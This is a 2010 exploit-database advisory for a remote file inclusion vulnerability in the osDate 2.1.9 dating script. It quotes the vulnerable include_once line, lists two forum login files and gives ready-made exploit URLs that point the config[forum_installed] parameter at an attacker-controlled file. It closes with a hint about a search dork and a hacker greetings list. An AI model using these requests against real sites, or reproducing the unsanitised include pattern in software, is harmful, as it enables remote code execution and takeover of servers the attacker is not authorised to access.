[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : osDate v 2.1.9 - Remote File Inclusion Vulnerabilities
# Published : 2010-03-15
# Author : NoGe
# Previous Title : Address Book Script v 1.09 - Local File Inclusion
# Next Title : Joomla Component com_linkr - Local File Inclusion
========================================================================================
[o] osDate Remote File Inclusion Vulnerabilities
Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]
Vendor : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
========================================================================================
[o] Vulnerable file
include_once($config['forum_installed'] . "_forum.php");
forum/adminLogin.php
forum/userLogin.php
[o] Exploit
http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]
[o] Dork
cari ndiri yee.. gampang koq dork na.. :p
========================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella
H312Y yooogy mousekill }^-^{ noname s4va stardustmemory
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
========================================================================================